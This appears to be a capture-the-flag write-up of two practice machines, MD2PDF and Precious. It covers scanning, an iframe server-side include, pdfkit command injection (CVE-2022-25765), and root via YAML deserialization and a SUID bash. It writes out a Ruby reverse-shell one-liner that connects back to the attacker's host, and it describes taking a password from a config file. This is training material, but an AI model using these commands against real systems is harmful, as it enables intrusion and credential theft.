THM - MD2PDF

 

Enumeration

We start with running nmap on the target to see what is running.

nmap -sC -sV -T 4 <target ip>

 

Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-20 16:27 GMT
Stats: 0:00:00 elapsed; 0 hosts completed (0 up), 0 undergoing Script Pre-Scan
NSE Timing: About 0.00% done
WARNING: Service 10.10.96.67:5000 had already soft-matched rtsp, but now soft-matched sip; ignoring second value
WARNING: Service 10.10.96.67:80 had already soft-matched rtsp, but now soft-matched sip; ignoring second value
Nmap scan report for 10.10.96.67
Host is up (0.033s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 753a85da4c79ab329dbb3486e2b0f9d6 (RSA)
|   256 60a68b3edac21e6987adb7a637db2793 (ECDSA)
|_  256 723233926e17948b751872c82e7123f5 (ED25519)
80/tcp   open  rtsp
| fingerprint-strings:
|   FourOhFourRequest:
|     HTTP/1.0 404 NOT FOUND
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 232
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
|     <title>404 Not Found</title>
|     <h1>Not Found</h1>
|     <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
|   GetRequest:
|     HTTP/1.0 200 OK
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 2660
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <meta charset="utf-8" />
|     <meta
|     name="viewport"
|     content="width=device-width, initial-scale=1, shrink-to-fit=no"
|     <link
|     rel="stylesheet"
|     href="./static/codemirror.min.css"/>
|     <link
|     rel="stylesheet"
|     href="./static/bootstrap.min.css"/>
|     <title>MD2PDF</title>
|     </head>
|     <body>
|     <!-- Navigation -->
|     <nav class="navbar navbar-expand-md navbar-dark bg-dark">
|     <div class="container">
|     class="navbar-brand" href="/"><span class="">MD2PDF</span></a>
|     </div>
|     </nav>
|     <!-- Page Content -->
|     <div class="container">
|     <div class="">
|     <div class="card mt-4">
|     <textarea class="form-control" name="md" id="md"></textarea>
|     </div>
|     <div class="mt-3
|   HTTPOptions:
|     HTTP/1.0 200 OK
|     Content-Type: text/html; charset=utf-8
|     Allow: GET, HEAD, OPTIONS
|     Content-Length: 0
|   RTSPRequest:
|     RTSP/1.0 200 OK
|     Content-Type: text/html; charset=utf-8
|     Allow: GET, HEAD, OPTIONS
|_    Content-Length: 0
|_rtsp-methods: ERROR: Script execution failed (use -d to debug)
|_http-title: MD2PDF
5000/tcp open  rtsp
| fingerprint-strings:
|   FourOhFourRequest:
|     HTTP/1.0 404 NOT FOUND
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 232
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
|     <title>404 Not Found</title>
|     <h1>Not Found</h1>
|     <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
|   GetRequest:
|     HTTP/1.0 200 OK
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 2624
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <meta charset="utf-8" />
|     <meta
|     name="viewport"
|     content="width=device-width, initial-scale=1, shrink-to-fit=no"
|     <link
|     rel="stylesheet"
|     href="./assets/codemirror.min.css"/>
|     <link
|     rel="stylesheet"
|     href="./assets/bootstrap.min.css"/>
|     <title>MD2PDF</title>
|     </head>
|     <body>
|     <!-- Navigation -->
|     <nav class="navbar navbar-expand-md navbar-dark bg-dark">
|     <div class="container">
|     class="navbar-brand" href="/"><span class="">MD2PDF</span></a>
|     </div>
|     </nav>
|     <!-- Page Content -->
|     <div class="container">
|     <div class="">
|     <div class="card mt-4">
|     <textarea class="form-control" name="md" id="md"></textarea>
|     </div>
|     <div class="mt-3
|   HTTPOptions:
|     HTTP/1.0 200 OK
|     Content-Type: text/html; charset=utf-8
|     Allow: HEAD, OPTIONS, GET
|     Content-Length: 0
|   RTSPRequest:
|     RTSP/1.0 200 OK
|     Content-Type: text/html; charset=utf-8
|     Allow: HEAD, OPTIONS, GET
|_    Content-Length: 0
|_rtsp-methods: ERROR: Script execution failed (use -d to debug)
<snip>------------<snip>
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.26 seconds

 

We have port 22 open, port 80 and port 5000. We will go straight to port 80 and further our enumeration. 

 

The server is hosting a Markdown to PDF converter. Let's convert something and see what is being used on the back end. 

It is using wkhtmltopdf 0.12.5 to convert the MD. Researching exploits and vulnerabilities for this version brings us to file inclusion! 

Let's find out what directories are on the server using gobuster.

 

└─$ gobuster dir --url http://10.10.96.67/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.96.67/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.4
[+] Timeout:                 10s
===============================================================
2023/02/20 17:10:11 Starting gobuster in directory enumeration mode
===============================================================
/admin                (Status: 403) [Size: 166]
/convert              (Status: 405) [Size: 178]
Progress: 87615 / 87665 (99.94%)
===============================================================
2023/02/20 17:18:37 Finished
===============================================================
 

Interesting, there is an admin and convert page. 

Exploitation

We want to try and have this admin page included within the conversion. Let's first test and see if there is input sanitization happening. 

We seem to be able to use html tags fine, let's try using an iframe and include the admin page. Unfortunately I forgot to screenshot the result of this but it didn't work! Remembering we had port 5000 open we adjust slightly.

 

 

And we have the flag!

 

 

HTB - Precious

Enumeration

First things first, let's run some basic enumeration to see what is running. 

 

 nmap -sC -sV -Pn -T 4 <target IP>

 ---------------

Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-15 14:35 GMT
Nmap scan report for 10.10.11.189
Host is up (0.11s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
|   3072 845e13a8e31e20661d235550f63047d2 (RSA)
|   256 a2ef7b9665ce4161c467ee4e96c7c892 (ECDSA)
|_  256 33053dcd7ab798458239e7ae3c91a658 (ED25519)
80/tcp open  http    nginx 1.18.0
|_http-server-header: nginx/1.18.0
|_http-title: Did not follow redirect to http://precious.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.99 seconds

 ---------------

 

We have ssh and http open, there looks to be a redirect on port 80 to http://precious.htb , let's edit our host file and add it in.  

 

 echo '10.10.11.189    precious.htb' | sudo tee -a /etc/hosts

If we now go to previous.htb we're greeted with a webpage for converting web pages to PDFs. 

 

Testing to see what is accepted:
test.com - no
/test/test - no

http://test.com - yes

 

We can fire up a http server to see how the site works:

python3 -m http.server 8000

Let's just throw in http://<my-IP>:8000/

We get a nice PDF of the file directory. Download and let's see what process is being used to create the PDF.

Open with Atril Document Viewer as that is what we have to hand and then check the properties of the PDF.

 

 

Awesome, we now know the process involves pdfkit v0.8.6 and we can go to our favourite search engine and see if there are any known exploits!

Bingo! We've got some Command Injection | CVE-2022-25765

 

Exploitation

Reading and veiwing various sources for this exploit we can begin to understand how to use the PoC. 

Using the PoC from sercurity.snyk.io we can send a request with the name parameter and then using the backtick with our command.

http://<our-IP>:8000/?name=%20`whoami`

 

 

Let's use the reverse shell from CyberArchitect

http://LOCAL-IP:LOCAL-HTTP-PORT/?name=%20`](http://LOCAL-IP:LOCAL-HTTP-PORT/?name=%20%60) ruby -rsocket -e'spawn("sh",[:in,:out,:err]=>TCPSocket.new("LOCAL-IP",LOCAL-LISTEN-PORT))')` 

 

Before running, set up your listener. 

 

We have a shell!

 

Switching to our home folder we see the .bundle folder, within here is a config file. cat that file and we get a password to the account henry. 

We can now use these newly obtained credentials to SSH into the box.

 

Privilege Escalation

Henry has permissions to run update_dependencies.rb as root. If we take a look at the file we find it is using YAML.load which is vulnerable to a deserialization attack. 

 

 

A payload can be found here 

With a blog post running through it here

We know from investigating update_dependencies.rb that loads the file dependencies.yml .

Create the file dependencies.yml and add the payload.

We're a step closer to root. We can edit the command now to try and get a shell. We're going to set the SUID bit on bash to allow henry to run bash as root.

The final payload looks like this:

 We run it, we're root, we switch to the home directory and we claim the flag!